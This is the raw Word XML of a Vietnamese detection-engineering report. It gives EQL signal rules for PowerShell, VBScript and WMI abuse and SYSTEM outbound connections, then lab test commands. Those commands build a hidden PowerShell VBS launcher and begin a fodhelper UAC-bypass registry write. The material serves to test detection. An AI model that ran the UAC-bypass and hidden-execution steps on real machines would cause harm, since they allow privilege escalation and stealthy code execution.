    </w:p>
    <w:p w14:paraId="7CEA5E6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process.name : "powershell.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4633F978"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destination.port in (443, 80, 8443)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F6540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user.name : ("SYSTEM", "NT AUTHORITY\\SYSTEM")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F02457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not cidrmatch(destination.ip,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252EE308"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"127.0.0.0/8","10.0.0.0/8","192.168.0.0/16","172.16.0.0/12")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C881B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31256B8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[file where winlog.event_id : "23"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039BD5CB"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process.name in ("powershell.exe", "cmd.exe")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6590DC"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(file.extension : "zip"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F72FFAB"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or file.path : ("*\\Windows\\Temp\\*","*\\Users\\Public\\*"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C7225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and user.name : ("SYSTEM", "NT AUTHORITY\\SYSTEM")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177DD1BB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E3B026" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F5E2F1A" w14:textId="77777777" w:rsidR="00602E07" w:rsidRDefault="00602E07">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E98B01" w14:textId="1AD1029E" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9.7 Signal Rules (S1-S</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F86801B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>S1 — VBScript Proxy (T1059.005, Medium, Risk 47):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAE294E" w14:textId="39ED3F4A"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process where</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437376AB"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winlog.event_id == "1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9C5616"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and winlog.channel == "Microsoft-Windows-Sysmon/Operational"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F6D45"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and process.name in ("wscript.exe", "cscript.exe")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5A2C95" w14:textId="5E2FE3C1" w:rsidR="00B01B4A"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and process.parent.name in ("fodhelper.exe", "cmd.exe")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF2B53A" w14:textId="77777777" w:rsidR="00602E07" w:rsidRDefault="00602E07">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606D0B19" w14:textId="3B41F221" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>S2 — Suspicious PowerShell Flags (T1059.001, Medium, Risk 47):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5016A2B6" w14:textId="7F060475"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process where</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6D0280"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winlog.event_id : "1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6405AEEE"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and not process.parent.name == "WmiPrvSE.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4914D6C6"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and winlog.channel : "Microsoft-Windows-Sysmon/Operational"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F803C80"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and process.name : "powershell.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359DDAC9" w14:textId="250AD3D0"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and ( process.command_line : ("*-WindowStyle*Hidden*", "*-w*hidden*", "*-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="001E275F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>WindowStyle 0*") ... )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DF1429" w14:textId="77777777"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and ( process.command_line : ("*-ExecutionPolicy*Bypass*", "*-ep*bypass*", "*-ep*unrestricted*", "*-EncodedCommand*") ... )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210861D5" w14:textId="201512C8" w:rsidR="00B01B4A"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1E275F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  and not process.parent.name in ("services.exe", "MsMpEng.exe")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC3FD49" w14:textId="77777777" w:rsidR="005F45BE" w:rsidRDefault="005F45BE">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599DDA6E" w14:textId="4EE4CE1D" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>S3 — WMI Consumer Spawns Suspicious Process (T1546.003, High, Risk 73):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E513E2" w14:textId="3ADF688C" w:rsidR="005F45BE" w:rsidRPr="005F45BE" w:rsidRDefault="005F45BE" w:rsidP="005F45BE">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5F45BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>process where</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C387AE6" w14:textId="77777777" w:rsidR="005F45BE" w:rsidRPr="005F45BE" w:rsidRDefault="005F45BE" w:rsidP="005F45BE">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5F45BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  winlog.event_id == "1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCFB36E" w14:textId="77777777" w:rsidR="005F45BE" w:rsidRPr="005F45BE" w:rsidRDefault="005F45BE" w:rsidP="005F45BE">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5F45BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  and winlog.channel == "Microsoft-Windows-Sysmon/Operational"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34234FC3" w14:textId="77777777" w:rsidR="005F45BE" w:rsidRPr="005F45BE" w:rsidRDefault="005F45BE" w:rsidP="005F45BE">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5F45BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  and (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B7CCA6" w14:textId="77777777" w:rsidR="005F45BE" w:rsidRPr="005F45BE" w:rsidRDefault="005F45BE" w:rsidP="005F45BE">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5F45BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    process.parent.name in ("WmiPrvSE.exe", "scrcons.exe")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B32C9DB" w14:textId="77777777" w:rsidR="005F45BE" w:rsidRPr="005F45BE" w:rsidRDefault="005F45BE" w:rsidP="005F45BE">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5F45BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    or process.parent.executable like "*\\\\WmiPrvSE.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5676B052" w14:textId="77777777" w:rsidR="005F45BE" w:rsidRPr="005F45BE" w:rsidRDefault="005F45BE" w:rsidP="005F45BE">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5F45BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    or process.parent.executable like "*\\\\scrcons.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22572ADC" w14:textId="77777777" w:rsidR="005F45BE" w:rsidRPr="005F45BE" w:rsidRDefault="005F45BE" w:rsidP="005F45BE">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5F45BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0513F113" w14:textId="77777777" w:rsidR="005F45BE" w:rsidRPr="005F45BE" w:rsidRDefault="005F45BE" w:rsidP="005F45BE">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5F45BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  and user.name in ("SYSTEM", "NT AUTHORITY\\SYSTEM")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69140D63" w14:textId="77777777" w:rsidR="005F45BE" w:rsidRPr="005F45BE" w:rsidRDefault="005F45BE" w:rsidP="005F45BE">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5F45BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  and process.name in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4152849A" w14:textId="77777777" w:rsidR="005F45BE" w:rsidRPr="005F45BE" w:rsidRDefault="005F45BE" w:rsidP="005F45BE">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sidRPr="005F45BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "mshta.exe", "rundll32.exe", "regsvr32.exe", "bitsadmin.exe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491C2DB3" w14:textId="15B5E888" w:rsidR="00B01B4A" w:rsidRDefault="005F45BE" w:rsidP="005F45BE">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r w:rsidRPr="005F45BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "certutil.exe", "msiexec.exe")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ACD6F6" w14:textId="77777777" w:rsidR="001E275F" w:rsidRDefault="001E275F">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5911F5FB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>S4 — SYSTEM PowerShell Outbound HTTPS (T1041, Critical, Risk 99):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211682BD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000"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Pr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>network where winlog.event_id : "3"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BB744A" w14:textId="72DE9B24" w:rsidR="001E275F" w:rsidRPr="001E275F" w:rsidRDefault="001E275F"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Pr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="001E275F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>and winlog.channel : "Microsoft-Windows-Sysmon/Operational"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A25D5B" w14:textId="60F2AD9C" w:rsidR="00B01B4A" w:rsidRPr="001E275F" w:rsidRDefault="00000000"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Pr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  and process.name</w:t>
      </w:r>
      <w:r w:rsidR="001E275F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> in (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"powershell.exe"</w:t>
      </w:r>
      <w:r w:rsidR="001E275F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001E275F" w:rsidRPr="001E275F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> "curl.exe"</w:t>
      </w:r>
      <w:r w:rsidR="001E275F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE45DF4" w14:textId="29F5C097" w:rsidR="00B01B4A" w:rsidRPr="001E275F" w:rsidRDefault="00000000">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Pr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  and destination.port in (443, 8443</w:t>
      </w:r>
      <w:r w:rsidR="001E275F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, 80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F510B7" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRPr="001E275F" w:rsidRDefault="00000000">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Pr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  and user.name : ("SYSTEM", "NT AUTHORITY\\SYSTEM")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA4A34D" w14:textId="66BF56A2" w:rsidR="00B01B4A" w:rsidRPr="001E275F" w:rsidRDefault="00000000" w:rsidP="001E275F">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  and not cidrmatch(destination.ip,"127.0.0.0/8","10.0.0.0/8","192.168.0.0/16")</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7717DE9C" w14:textId="682AA8D0" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="AAAAAA"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>X. KIỂM THỬ TỪNG PHASE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C3FE41" w14:textId="0B8A0F3F" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>.1 Phương Pháp Kiểm Thử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFDFFEC" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Mỗi phase được kiểm thử độc lập bằng cách thực thi test command trực tiếp trên Windows 10 VM, sau đó xác nhận alert xuất hiện trong Kibana SIEM. Kết quả kỳ vọng: đúng rule fire, đúng severity, trong vòng 1-2 phút sau khi thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114FC153" w14:textId="6B1BA3C1" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>.2 Test Commands và Kết Quả Kỳ Vọng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB856A8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 2 — Test S1, S2 (VBScript + PowerShell flags)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E14C24" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Tao VBS proxy thu cong (khong can chay full setup.bat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4332C424"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$vbs = "$env:TEMP\test_proxy.vbs"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9B625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Set-Content $vbs -Value 'Set o=CreateObject("WScript.Shell")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D192FA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Add-Content $vbs -Value 'o.Run "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command Write-Host Test",0,False'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A44DC8C"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Start-Process wscript.exe -ArgumentList $vbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECDD56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697FC10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Ket qua ky vong:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651C2A6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S1 fire: wscript.exe command_line contains 'powershell' + 'Hidden' + 'Bypass'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04930EC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S2 fire: powershell.exe command_line contains '-WindowStyle Hidden' + '-ExecutionPolicy Bypass'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ABAB76" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>#   Severity: Medium | Risk: 47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F23663" w14:textId="77777777" w:rsidR="00602E07" w:rsidRDefault="00602E07" w:rsidP="00602E07">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00602E07">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59F3F33C" wp14:editId="6E215D13">
            <wp:extent cx="6120130" cy="2173605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="160776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60572" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2173605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDD914E" w14:textId="512F6042" w:rsidR="00B01B4A" w:rsidRDefault="00602E07" w:rsidP="00602E07">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 19 :</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4161">
        <w:t>Alert S1 và S2 xuất hiện trong Kibana SIEM sau khi thực thi test command Phase 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717B2DAD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 3 — Test C1 (UAC Bypass sequence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D943D83" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Chay setup.bat trong folder chua payload (yeu cau payload.ps1 &amp; setup.hta)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B08813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Hoac test thu cong sequence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7051DE6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0FCE74A2"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Step 1: Registry write (sinh EID 13)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5D228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reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560246F2"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/ve /t REG_SZ /d "wscript.exe" /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30688ADB"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35A3BE57"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Step 2: Trigger fodhelper (sinh EID 1)</w:t>
